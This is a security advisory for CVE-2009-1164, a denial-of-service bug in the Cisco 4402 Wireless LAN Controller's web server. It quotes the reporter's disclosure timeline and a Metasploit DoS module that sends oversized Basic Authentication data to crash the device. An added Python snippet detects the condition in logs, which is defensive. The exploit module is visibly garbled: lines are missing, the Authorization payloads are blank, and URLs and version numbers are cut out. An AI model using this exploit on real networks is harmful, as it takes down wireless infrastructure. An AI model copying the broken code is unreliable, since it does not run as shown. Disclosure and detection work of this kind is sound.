Category:   Device (Router/Bridge/Hub)  >   Cisco Wireless LAN Controller
Vendors:   Cisco
Cisco Wireless LAN Controller Basic Authentication Processing Bug Lets Remote Users Deny Service
SecurityTracker Alert ID:  1022600
SecurityTracker URL:
CVE Reference:   CVE-2009-1164   (Links to External Site)
Updated:  Oct 16 2009
Original Entry Date:  Jul 27 2009
Impact:   Denial of service via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 3.2 prior to, 4.2 prior to, 5.0 prior to
Description:   A vulnerability was reported in the Cisco 4402 Wireless LAN Controller. A remote user can cause denial of service conditions.

A remote user can send specially crafted authentication data to the target emweb http daemon to cause the target device to reboot.

Supplying HTTP Basic Authentication data with a username and password each longer than 63 characters to '/screens/frameset.html' can trigger the flaw.
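
For defenders reviewing proxy logs or reassembled captures, the condition described above can be checked as follows. This is an added example, not part of the advisory or the reporter's message; the function names and the assumption that requests are available as raw text are illustrative, and the sample requests are constructed.

```python
import base64
import binascii

LIMIT = 63                              # advisory: each field longer than 63 characters
TARGET_PATH = "/screens/frameset.html"  # path named in the advisory

def basic_credentials(header_value):
    """Return (user, password) bytes from a Basic Authorization value, else None."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token.strip():
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None                     # undecodable token: not the reported condition
    user, sep, password = decoded.partition(b":")
    return (user, password) if sep else None

def inspect_request(raw):
    """Classify one raw HTTP request as 'match', 'oversized-other-path' or 'ok'."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = lines[0].split(" ")
    path = parts[1].split("?", 1)[0] if len(parts) >= 2 else ""
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "authorization":
            continue
        creds = basic_credentials(value)
        if creds and len(creds[0]) > LIMIT and len(creds[1]) > LIMIT:
            return "match" if path == TARGET_PATH else "oversized-other-path"
    return "ok"

def sample(path, user, password):
    """Constructed test input for the detector (never sent anywhere)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"GET {path} HTTP/1.0\r\nAuthorization: Basic {token}\r\n\r\n"

if __name__ == "__main__":
    for req in (sample(TARGET_PATH, "a" * 64, "b" * 64),
                sample(TARGET_PATH, "admin", "b" * 64),
                sample("/index.html", "a" * 64, "b" * 64)):
        print(inspect_request(req))
```

The 'oversized-other-path' result is reported separately because the source message notes that other products using the same embedded web server might be affected.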

The vendor was notified on January 13, 2009.

A demonstration exploit is provided:

Authorization: Basic

The vendor has assigned Cisco Bug ID CSCsx03715 to this vulnerability.

Versions 4.1, 4.1M, 4.2M, and 6.0 are not affected.

Christoph Bott reported this vulnerability.

Impact:   A remote user can cause the target device to crash.
Solution:   The vendor has issued a fix (,,

The vendor's advisory is available at:

Vendor URL: (Links to External Site)
Cause:   Not specified

Message History:   None.

 Source Message Contents

Subject:  [Full-disclosure] Cisco WLC 4402 Denial-of-Service vulnerability

Vulnerable Product: Cisco WLC 4402 (most likely among many others)
Vulnerability discovered: January 2009
Reported to vendor: Jan 01, 2009
Fix available: not yet

+ 01/11/2009: discovered vulnerability on a customer's site

+ 01/13/2009: initial vendor contact via

+ 01/14/2009: vendor opened PSIRT case ID PSIRT-1018301631

+ 02/09/2009: vendor states, that bugfix is _not_ contained within

+ 03/30/2009: vendor states: "We have a fix for this issue. However,
due to some other issues we are investigating we may not make this
public until about 42 days."

+ 06/02/2009: vendor states: "I really apologize for the delay on
publishing this advisory. The reason that we have not publish is because
we are also incorporating other security fixes within all the affected
releases. We WILL be publishing the advisory on July 8th, 2009 at 1600 UTC."

+ 07/24/2009: Customer agreed with full disclosure

+ 07/26/2009: Still no fixes available; full disclosure due to lacking
vendor activities.

The Cisco WLC 4402 is a Wireless LAN Controller, which is manageable via
an integrated embedded webserver (emweb httpd).

The vulnerability described below could have been verified on WLC 4402,
software release However, since the vulnerability affects the
integrated embedded emweb http daemon, several other products and/or
software releases might be affected, too.

Using long, random authentication data, the embedded web server can be
crashed, which leads to a device reboot. Subsequently repeated requests
lead to a permanent denial of service of the WLC (and therefore of the
whole wireless infrastructure).

Not needed.

One only has to call
and provide Basic Authentication data which uses
a username and password longer than 63 characters each.

The following header worked for me:
Authorization: Basic

The following code snippet can be used as a module within the metasploit

---- snip -----
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::Tcp
        include Msf::Auxiliary::Dos

        def initialize(info = {})
                        'Name'           => 'Cisco WLC 4200 Basic Auth Denial of Service',
                        'Description'    => %q{

                                This module triggers a Denial of Service condition in the Cisco WLC 4200
                                HTTP server. By sending a GET request with long authentication data, the
                                device becomes unresponsive and reboots. Firmware is reportedly vulnerable.
                        'Author'                => [ 'Christoph Bott <msf[at]>' ],
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision: 5949 $',
                        'References'     =>
                                        [ 'BID', '???'],
                                        [ 'CVE', '???'],
                                        [ 'URL',
                        'DisclosureDate' => 'January 26 2009'))

                        ], self.class)


        def run

                print_status("Sending HTTP DoS packet")

                sploit =
                        "GET /screens/frameset.html HTTP/1.0\r\n" +
                        "Authorization: Basic

                sock.put(sploit + "\r\n")



---- snip ----
